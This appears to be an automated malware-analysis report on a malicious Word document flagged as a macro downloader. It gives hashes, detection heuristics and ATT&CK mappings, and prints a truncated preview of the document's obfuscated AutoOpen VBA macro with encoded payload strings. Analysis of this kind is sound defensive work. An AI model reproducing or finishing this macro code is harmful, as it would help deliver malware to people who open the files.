Office (OLE) malware analysis — malicious · 3adbbc7877109c40

MALICIOUS

Office (OLE)

240.0 KB Created: 2018-03-29 14:13:00 Authoring application: Microsoft Office Word First seen: 2018-04-12

MD5: 70bfc545f0232149b13206c4574077de SHA-1: d9774953bd8bfde6d3917988e54c11fda5892998 SHA-256: 3adbbc7877109c4039f59394fcb73f89fcbccf8ceabbbd4b043f332587f80e35

224 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro uses CreateObject and an AutoOpen function, indicating it's designed to execute code upon opening. The presence of a 'macros.bas' file and the ClamAV detection 'Doc.Malware.Emodldr-10025032-0' strongly suggest this macro is intended to download and execute a secondary payload.

Heuristics 8

ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	40238 bytes
SHA-256: `46afbb6a6e2d8b4917f59e6152b9c99136d960f6dc584a1d9c593311e4c32813`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 19 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "fEwTjcRmHoiMPz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "sKtMbmHMWo" Function wBKvpzjBk() On Error Resume Next VXWuv = 77183 / Round(dwiaD) + wJKtI - CStr(90417) * naRzL * RXAzh * zrWbEE * zTtYB hajio = XQBPvF rOWKb = JiQBqT("UKjGUAMQBjADIAOAA1ADMANgBjADUAMgA3ADkANgAzADYAYwAxAGUANgBiAGUAYQBlADIAYQBkADAAZgBkAGQAMgA3ADQAYQBiAGEAOQBmADIAZgA2ADgAMAAyADYAMAA2AGIAMwBmAGYAYQBkADkAZQBjAGEAZgAwADgAYwA4ADYAZgA3AGIAMQBlAGMAYgA1AGIAMg@OlZ", 4, 197) ikWsd = 925 / Round(mEPahG) + uvFtBQ - CStr(89323) * kkpMSK * zcaWh * dcaQY * SdLGA qdVwVt = bEAlDR dzYzV = 8122 / Round(zjPRD) + NBkIM - CStr(67501) * qSsoL * VZaJMc * caciPR * lNVQA NolrzS = jhLGj daNjp = JiQBqT("jkbYgAZAA5ADBP", 5, 8) fiuZaC = 79270 / Round(dmYBs) + jbczcn - CStr(70421) * jojKuX * uOVzb * TrouNL * jCMqG YFFOd = DCCFqP RDNJni = 47687 / Round(dkzbuH) + SVajG - CStr(14065) * qwpPYa * ElwPXN * zaiiVj * NuzBqp oHvms = MOTYG wCmbHqsYMR = JiQBqT("0J7JhYgA4AGEAMgAwADUAZgBlADYAYQA3ADAANgA4ADIANQA3ADMANQA2ADYAYwBlADYAMAAwAGMEm", 7, 70) wZwBLW = 88698 / Round(SuvBl) + QdDsO - CStr(64551) * kPdAdf * jkHGcW * IPtlfw * muLuAU jLaJY = NJVAi ulrdz = 53674 / Round(NXPwH) + qzzHo - CStr(59999) * BizfPl * kPiwQ * ZIIOC * AjtUF JwdRG = APwMPm irMzrWG = JiQBqT("O2wjOGIANAAwPtU", 6, 7) OMaoz = 85334 / Round(imlir) + FiiMIK - CStr(87147) * FoXSJ * wAWNsV * owavv * oZXKva iWllE = toIXC Wmvslh = 31838 / Round(OoXFi) + vEiiZi - CStr(42169) * NXflA * lRFkAA * rHAFk * wnDuf jwBYE = uWSZXM jjKoCW = JiQBqT("KiADkANgA0AGUAZQA0ADcAOAA1AGUAYgAzAGMANgAyADQAMgA0ADIAOQBlAGMAMwBmADkAOAA4ADkAZgAyAGUANwA5ADAAMQBkAGJKm0IUZ", 2, 99) hofzj = 74736 / Round(hsDzh) + oRXPJ - CStr(55721) * PRfksA * GilSj * FDZTqU * bortE frdzDQ = NkQIvE kEaPkK = 93992 / Round(IjXEHN) + YSbNI - CStr(20522) * qXiuU * rZvFO * oSIJko * fXDjq caFXiv = jUOClp nLThiiVCQdf = JiQBqT("HEiAGEAMQAyAGIAZQA3ADgANQA3ADUAZQA1AGIANwAwADcAZgA2AGQANgAwADUANwBmAGYAMQBmADUAYgBhAGYANgAxADIAMgA1ADIAYgA2ADMAYgBhADAAYgBCSz94", 4, 119) uCjoRp = 58185 / Round(vPJrY) + ismrn - CStr(15279) * bmCQJQ * TEGYvw * dnPOB * DfqOn qCcbK = hzSQhX Lkqlt = 34527 / Round(NOjrR) + Nzlini - CStr(52198) * SKWbL * ZKCJSN * hKfMt * pAwAiv khlfkJ = wsZTKi YNSiVO = JiQBqT("SIADAAYwAwAGIAOABjADYANgA0AGUAMAA0ADQAYgBhADO7YfT3", 3, 42) wCMWYE = 74465 / Round(mGRukm) + WJnfN - CStr(81853) * ZXZJhI * lLCKGq * jiKrKE * fNpYuf PfiUA = dowPX dhYqYl = 30516 / Round(PjiqO) + INVmM - CStr(85694) * TWuqJa * jozjo * lIUhoM * cTjsin CQUBEq = JLiAOL jFBHDdU = JiQBqT("4jj0kAZgA1ADkAMQA2ADMANgBkAGQAMwBiADEAZAA0AGQAMAA1ADEAYwAzAGUAYQAzAGQANgBmAYPjH", 5, 71) lamuBT = 70287 / Round(snzAQ) + AnCHV - CStr(75678) * TUwfw * bzqjZB * rszzhT * CXjDE oJXbt = YdSGqP VlkPr = 85112 / Round(pqnCS) + tCfCW - CStr(62252) * pjFcj * zYlvwu * lTrja * vzBfvr Yisao = vHWljI nJOFCPW = JiQBqT("DQAzADAAZQBjAGMANQBkAGYANgAyADIANwBkADIAYwA2AGUANQA4ADIANwAwADkAZQBjAGMAMwA3AGIANABkADQAOAAxADkAOABlADMANgA4AGIANgAxADzvJH0c7", 2, 117) stwDuo = 14019 / Round(XZKzb) + kGnEJk - CStr(57095) * UfLHEz * PiLXst * DwlHk * BEhaMJ AijXX = RYQsn AonSi = 38942 / Round(VTwFjK) + RWWYf - CStr(5353) * hItqw * MEDWa * FOnDs * cjiwlO NtPjtM = anSftc TWPYXJAZD = JiQBqT("rWwU2KGQAYwAxAGMAZAA2ADMAMwA4Un0", 7, 23) KWQPbf = 48605 / Round(AdTdc) + WqlXi - CStr(90828) * QwYKKo * SwHJQQ * JRjKj * JtlNP jEzjHP = utasEQ FjuIsF = 10335 / Round(wnFaaC) + TrRFE - CStr(40581) * CumYi * OYzbPO * qVZRj * XVAQpD KKJKOz = AiAVT tCKoYRXE = JiQBqT("LX@7MAAyAGQAMgA1AGIANABkAGIAZAA1ADcAZAAyADIAYgA2AGUAOABhADYAZgBjADUAYwA5AGQAZAAzADkANQA3AGQAZgAzAGIAMABiAGEANwBhADUAE45", 5, 112) RYXodL = 23410 / Round(LwRAVW) + iCdwUq - CStr(56564) * OoNPq * LUDzJ * zzMni * zwLrKs bRcXYw = oUJzPw NzPYdf = 33415 / Round(DqdYO) + kBvEsq - CStr(18865) * JQWNYf * szFtU * SQKaH * QtmnL huIwQv = cdozB LsuKX = JiQBqT("zj4ADQAOAA4ADAAOAAzAGMAMgA5ADkAM3J3X,B", 4, 29) HmkKq = 46705 / ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.